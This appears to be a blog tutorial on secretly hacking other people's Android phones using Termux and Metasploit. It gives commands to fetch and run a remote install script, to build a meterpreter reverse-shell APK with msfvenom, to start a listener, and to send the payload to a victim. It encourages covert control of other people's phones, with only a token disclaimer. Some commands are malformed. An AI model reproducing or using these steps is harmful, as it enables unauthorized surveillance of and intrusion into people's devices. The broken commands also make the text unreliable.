
How to Hack People’s Cellphones with Termux – Termux is a terminal emulator application for Android as well as Linux environment that runs on Android without the need for rooting or special settings.
What distinguishes Termux from other terminal emulator applications is that Termux has been set up so that the Termux environment is the same as the Debian Linux environment.
Because the Android environment is different from the Linux environment in general, in Termux you can install packages or tools commonly used in Linux operating systems.
With the features and environment settings as above, Termux is very special.
Because you can install Penetration Testing Tools (pen-testing tool) or hacking tools like Metasploit and net hunter on your Android phone using Termux.
Termux also provides a package manager (APT) to make it easier for you to find and install the required packages from the software provided by Termux.
Many people want to know how to control other people’s HP without being noticed for their benefit.
No need to worry because in this article we will discuss how to hack people’s cellphones with Termux, so stay tuned for this review until the end.
How to Hack People’s Cellphones with Termux
1. How to Hack People’s Cellphones with Termux with Metasploit Termux
![]() |
| How to Hack People’s Cellphones with Termux with Metasploit Termux |
As explained in the review above, Termux is an application that functions to hack.
In this article, we will show you how to make a basic payload for Android phones to hack other people’s cellphones without a computer.
To do this you only need to install Termux and a few packages first.
Well, for more details, here are the steps on how to hack people’s cellphones with Termux, namely Metasploit Termux:
- The first step, please install Metasploit Termux at the following link Click here
- If so, please type the following Termux code:
$ apt-get update
$ apt-get upgrade
$ apt-get install wget
$wget https://github.com/1Tech-X/Auxilus.github.io/blob/master/metasploit.sh
$ cd Home
$ bash Metasploit.sh
- After that you can create an Android payloud with the following Termux code:
msfvenom -p android/meterpreter/reverse_http lhost = “your IP address” 8080 r > “application name”.apk
lhost = your local IP address, you can check your IP address just by typing ipconfig in termux then hit enter. Later your IP will appear.
r> = name the payloud app name with .apk for android (free with any name)
- If you have already created the payload, you can start the metasploit listener to establish a session with the target Smartphone, to do so you can type the following command:
$ msfconsole
$ use exploit/multi/handler
$ set payload android/meterpreter/reverse_http
$set lhost = (your IP)
$ set lport = 8080
$ exploit
- If so, then metasploit will start the connection from your cellphone.
- After that you send the payload to the target Smartphone.
- If the target has installed it on his cellphone, then you will get a connection from the target.
- Finished.
If there is an error when installing Metaspolit, please check whether the method above has been done correctly.
Because most people find it difficult to install metasploit or install it in a hurry so it can’t run smoothly.
The final word
You need to note that how to tap people’s cellphones with Termux is only for information to increase your knowledge.
So please try it step by step to get perfect results so that you can successfully do wiretapping.
If it doesn’t work, repeat again more thoroughly because this method requires a bit of precision and concentration.
This is the information we can share with you about how to hack someone’s cellphone with Termux in this article. Hopefully useful and good luck.
